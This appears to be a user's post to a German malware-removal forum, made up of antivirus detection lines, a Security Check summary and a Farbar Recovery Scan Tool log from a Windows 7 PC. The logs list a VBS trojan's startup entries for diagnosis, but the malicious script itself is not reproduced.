sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs"
sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\Desktop\Antivir\Trojanerboard\wtbchkxbde..txt"
         
Security Check:
Code:
ATTFilter
 Results of screen317's Security Check version 0.99.81  
 Windows 7  x64 (UAC is disabled!)  
 Out of date service pack!! 
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
Avira Desktop   
 Antivirus out of date! (On Access scanning disabled!) 
`````````Anti-malware/Other Utilities Check:````````` 
 Adobe Flash Player 10 Flash Player out of Date! 
 Adobe Reader 9 Adobe Reader out of Date! 
 Mozilla Thunderbird (24.3.0) 
 Google Chrome 33.0.1750.146  
 Google Chrome 33.0.1750.154  
````````Process Check: objlist.exe by Laurent````````  
 Avira Antivir avgnt.exe 
 Avira Antivir avguard.exe 
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  
````````````````````End of Log``````````````````````
         

FRST:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 23:36:08
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 23:36 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:36 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 23:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-17 23:14 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 23:14 - 2013-04-16 19:13 - 01673821 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-17 08:28 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:33 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 05:32 - 2009-07-14 06:51 - 00088400 _____ () C:\Windows\setupact.log
2014-04-17 02:07 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-17 02:07 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-17 02:07 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
